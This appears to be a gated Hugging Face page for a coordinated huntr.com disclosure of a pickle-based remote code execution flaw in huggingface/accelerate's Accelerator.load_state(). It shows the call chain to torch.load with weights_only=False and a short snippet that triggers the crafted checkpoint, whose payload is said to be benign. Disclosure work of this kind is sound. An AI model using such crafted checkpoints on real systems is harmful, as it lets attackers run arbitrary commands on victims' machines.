Security PoC — gated for review
This repository is publicly accessible, but you have to accept the conditions to access its files and content.
This repository hosts a proof-of-concept malicious checkpoint for a coordinated huntr.com vulnerability disclosure. Access is restricted to security reviewers.
Log in or Sign Up to review the conditions and access this model content.
huggingface/accelerate Accelerator.load_state() — pickle RCE (PoC)
Proof-of-concept for a coordinated huntr.com disclosure against
huggingface/accelerate.
custom_checkpoint_0.pkl is a crafted accelerate custom-state checkpoint.
Resuming through the public API:
from accelerate import Accelerator
acc = Accelerator(); acc.register_for_checkpointing(obj)
acc.load_state("<dir containing custom_checkpoint_0.pkl>") # RCE
triggers arbitrary OS command execution: load_state() →
load_custom_state() → torch.load(..., weights_only=False)
(src/accelerate/checkpointing.py), which deserializes pickle and honors
__reduce__. Vulnerable on every torch version (the flag is explicit).
The bundled payload is benign — runs id, writes /tmp/accelerate_pwned.txt.
Gated (manual approval) so the PoC is not freely downloadable; access granted
to huntr's reviewer (protectai-bot).